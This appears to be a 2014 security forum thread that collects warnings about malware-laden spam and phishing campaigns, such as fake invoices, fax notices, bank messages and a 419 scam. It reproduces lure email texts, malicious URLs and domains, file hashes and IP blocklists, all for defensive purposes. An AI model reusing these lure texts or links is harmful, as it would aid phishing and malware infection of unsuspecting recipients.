11 Seo 2014 - "There is currently some sort of injection attack against WordPress sites that is injected code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID.ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78 "
176.58.100.98: https://www.virustotal.com/en-gb/ip-address/176.58.100.98/information/
178.62.254.78: https://www.virustotal.com/en-gb/ip-address/178.62.254.78/information/
___
Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecurity.co.uk/employees-important-address-update-fake-pdf-malware/
11 Sep 2014 - "'To All Employee’s – Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
To All Employee’s:
The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct... If changes need to be made, contact HR .. Administrator ...
11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ... another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
*https://www.virustotal.com/en/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410456657/
- http://blog.dynamoo.com/2014/09/to-all-employees-important-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From: Administrator [administrator@ victimdomain .com]
Date: 11 September 2014 22:25
Subject: To All Employee's - Important Address UPDATE
To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...
The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
___
Fake picture or video SPAM – jpg malware
- http://myonlinesecurity.co.uk/new-picture-video-message-fake-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake windows short cut file .pif Even setting show file extensions will, not show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
You have received a picture message from mobile phone number +447586595142 picture
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service
There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service
... there will be hundreds of different sites. The zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same # and detection rate as the pif file earlier submitted to virus total*
11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to: IMG_00005_09112014.jpeg.pif
Current Virus total detections:4/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410430034/
** https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/
___
Fake 'new order' SPAM – PDF malware
- http://myonlinesecurity.co.uk/new-order-fake-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- windows short cut file .pif . Even setting show file extensions will -not- show the .pif extension in windows 8 and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/new-order.png
11 September 2014: 2014.09.11.zip : Extracts to: 2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/
:mad::mad: :fear:
AplusWebMaster
2014-09-12, 12:08
FYI...
Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu/2014/09/12/fake-email-copie-facture-societe-lws-fc-contains-malicvious-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...
The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. the VBS script in fact is encoded to hide the real purpose but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/adf506eebd74dbdd2e23ab2a0918912a95105745226302cca32c760c34d196a5/analysis/
___
Fake Household Improvement SPAM - Zbot Malware
- https://blog.malwarebytes.org/fraud-scam/2014/09/household-improvement-emails-come-with-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/09/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot. Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**... there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecurity.co.uk/m-m-kitchen-appliances-inv211457-fake-word-doc-malware/
** https://www.virustotal.com/en/file/941434a32431048380956c6bb7c6be5fd4105ac397eb8c46011d27e827014f73/analysis/
*** http://blog.mxlab.eu/2014/09/12/fake-email-with-attached-invoice-from-broad-oak-toiletries-ltd-contains-trojan/
___
Data Breaches and PoS RAM Scrapers
- http://blog.trendmicro.com/trendlabs-security-intelligence/2014-an-explosion-of-data-breaches-and-pos-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and has open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and installs Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."
:mad: :fear:
AplusWebMaster
2014-09-15, 03:44
FYI...
Phish - Paypal ...
- http://myonlinesecurity.co.uk/paypal-account-will-limited-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever follow the links in the email...
PayPal account information :
Hello,
Dear PayPal user ,
Your account will be limited if you not confirm it .
Need Assistance?
Some information on your account appears to be missing or incorrect.
Please update your account promptly so that you can continue to enjoy
all the benefits of your PayPal account.
If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
Please Login to confirm your information :
http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
Reference Number: PP-003-211-347-423
Yours sincerely,
PayPal
This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rangeview_paypal_phishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."
:fear: :mad:
AplusWebMaster
2014-09-15, 13:13
FYI...
Fake Termination SPAM – malware
- http://myonlinesecurity.co.uk/termination-due-policy-violation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted- . NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SH1 or MD5#. Loads of slightly different subjects with this one, including
Policy violation #59892665326
Termination due to policy violation #33205939124
Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
Hello,
We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
- 0A4 44 12.09.2011
- 0A4 46 12.09.2011
- 0A4 85 12.09.2011
You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
Sincerely,
Pauletta Stephens ...
15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to: disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/eb62d2fc255b934706b15eb5fa4f07fdf3a900810820ef60db62b77de1d4c4ef/analysis/
... Behavioural information
TCP connections:
187.45.193.139: https://www.virustotal.com/en/ip-address/187.45.193.139/information/
213.186.33.87: https://www.virustotal.com/en/ip-address/213.186.33.87/information/
23.62.99.33: https://www.virustotal.com/en/ip-address/23.62.99.33/information/
66.96.147.117: https://www.virustotal.com/en/ip-address/66.96.147.117/information/
UDP communications:
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
LinkedIn feature exposes Email Addresses
- http://krebsonsecurity.com/2014/09/linkedin-feature-exposes-email-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___
Fake Overdue invoice SPAM - malicious .arj attachment
- http://blog.dynamoo.com/2014/09/overdue-invoice-6767390-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
From: Mauro Reddin
Date: 15 September 2014 10:32
Subject: Overdue invoice #6767390
Morning,
I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
Best regards,
Mauro Reddin ...
The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustotal.com/en-gb/file/c21b719a9cf4c5aa9d8927c185be4181d7c465b01fa85e38c7a3d459930e2203/analysis/1410773681/
___
Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:
Screenshot: http://4.bp.blogspot.com/-knPfcbJT0Q4/VBbJyysrTNI/AAAAAAAAFnI/YbEjR56dgRU/s1600/sage.png
... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
florensegoethe .com.br
coursstagephoto .com
vicklovesmila .com
flashsavant .com"
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/
___
Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-natwest-fake-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...
15 September 2014: SecureMessage.zip ( 8kb) : Extracts to: SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/
- http://threattrack.tumblr.com/post/97567721558/natwest-secure-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/65aed37f33dcaf8e16e0b2e828d4f53e/tumblr_inline_nby6ovZu2c1r6pupn.png
___
Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecurity.co.uk/lloyds-bank-new-secure-message-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]
(New users may need to verify their email address)
If you do not see or cannot click “Read Message” / click here
Desktop Users:
You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
Mobile Users:
Install the mobile application.
Protected by the Voltage SecureMail Cloud
SecureMail has a NEW LOOK to better support mobile devices!
Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/lloyds_bank_secure_message.png
This one wants your personal details and bank details..."
___
Fake Fax SPAM - malware attachment
- http://myonlinesecurity.co.uk/received-fax-fake-pdf-malware/
15 SEP 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a new fax. This fax was received by Fax Server.
The fax has been downloaded to dropbox service (Google Inc).
To view your fax message, please download from the link below. It’s
operated by Dropbox and safety...
Received Fax Details
Received on:1 5/09/2014 10:14 AM
Number of Pages: 1 ...
15 September 2014: Docs0972.zip ( 8kb): Extracts to: Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bec0ac2711f99f90f27a29a9e021bedfede02c139f26dcfae36e2d8895babf52/analysis/1410804563/
___
Twitch users shook by money spending malware
- http://www.theinquirer.net/inquirer/news/2367489/twitch-users-shook-by-money-spending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow the clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure.com/weblog/archives/00002742.html
:fear::fear: :mad:
AplusWebMaster
2014-09-16, 12:16
FYI...
Fake 'Payments' SPAM ...
- http://blog.mxlab.eu/2014/09/16/trojan-genvariant-graftor-155439-present-in-fake-emails-regarding-payments/
Sep 16, 2014 - "... intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done” is sent from a spoofed address and has the following body:
Dear sir,
Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
Cont. #42 EXSQI013/MAY/13 US$29,154.66
Total Remittance: US$ 51,704.97
Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
Thank you very much.
Best regards,
Me
The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/db9eb842deb7cbda56c3df7c1e198fac5f0d65d0d8ef9df2f13618d18416c686/analysis/
The second email comes with the subject “Re: Balance payment” is sent from a spoofed address and has the following body:
The attached TT copy is issued at the request of our customer. The advice is for your reference only.
Yours faithfully,
Global Payments and Cash Management
Bank of America (BOA)
This is an auto-generated email, please DO NOT REPLY. Any replies to this
email will be disregarded...
The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/f7f1b10365b995c308d1cc4a3f025e5e7f249fbfee82f7bcd8297e1c5fcc1635/analysis/
___
Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu/2014/09/16/email-my-new-photo-contains-a-variant-of-trojan-win32-swizzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
my new photo ;)
if you like my photo to send me u photo
The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 127 kB large file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/83d322707828350ba51301b1a0d02ee0c831b88bb9722036ade2b7d8827817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustotal.com/en/ip-address/131.253.40.1/information/
137.254.60.32: https://www.virustotal.com/en/ip-address/137.254.60.32/information/
134.170.188.84: https://www.virustotal.com/en/ip-address/134.170.188.84/information/
157.56.121.21: https://www.virustotal.com/en/ip-address/157.56.121.21/information/
91.240.22.62: https://www.virustotal.com/en/ip-address/91.240.22.62/information/
___
Fake USPS SPAM - word doc malware
- http://myonlinesecurity.co.uk/usps-postal-notification-service-fake-word-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/usps-postal-notification-service.png
16 September 2014: Label.zip ( 82 kb): Extracts to: Label.exe
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6678ff966e942e4bf669d8a240acbab79971c871152f3c16478a3ec0c3f5c805/analysis/1410841682/
___
Fake 'inovice' SPAM ...
- http://blog.dynamoo.com/2014/09/inovice-0293991-september-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment
The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series a DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block- .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustotal.com/en-gb/file/ee43410ecaba583a03eb3cfbf1af1afb38a5f25cd8742b47372b853d83fc7089/analysis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustotal.com/en/ip-address/208.91.197.27/information/
___
Fake FAX SPAM... again
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From: Fax
Date: 16 September 2014 11:05
Subject: You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...
The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
188.165.204.210
brisamarcalcados .com.br
triera .biz.ua
yerelyonetisim .org.tr
ngujungwap .mobi.ps "
* https://www.virustotal.com/en-gb/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo.com/2014/09/kifilwe-shakong-copied-invoices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is not the person sending these messages, they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From: Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date: 16 September 2014 12:17
Subject: Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...
Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
golklopro .com
94.100.95.109
31.134.29.175
176.213.10.114
176.8.72.4
176.99.191.49
78.56.92.46
195.114.159.232
46.98.234.76
46.185.88.110
46.98.122.183
46.211.198.56
195.225.147.101
176.53.209.231 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/e324d73b36f1fd31c53f6ae21457c2fd57f90be56dcd776efbe06b01fdaf3d5d/analysis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo.com/2014/09/unpaid-invoice-notification-spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
From: Christie Foley [christie.foley@ badinsky .sk]
Reply-to: Christie Foley [christie.foley@ badinsky .sk]
Date: 16 September 2014 13:55
Subject: Unpaid invoice notification ...
Screenshot: https://1.bp.blogspot.com/-4dVURai9zaE/VBg551t4f-I/AAAAAAAAFoA/l2blM5UgsbU/s1600/invoice.png
The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/report.php?id=1410873578924
- http://myonlinesecurity.co.uk/notification-amount-overdue-recent-invoice-java-exploit-malware/
16 Sep 2014
___
Fake 'PAYMENT SCHEDULE' email - 419 SCAM
- http://myonlinesecurity.co.uk/reyour-payment-schedule-pretending-come-dr-mrs-ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam- . After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
Attn:Beneficiary,
My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
Teller Machine System( ATM CARD).
Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
Reply also to : fminister88 @gmail .com
Your faithfully.
Dr Mrs Ngozi O. Iweala.
Finance Of Minister.
[Arrgghh...]
___
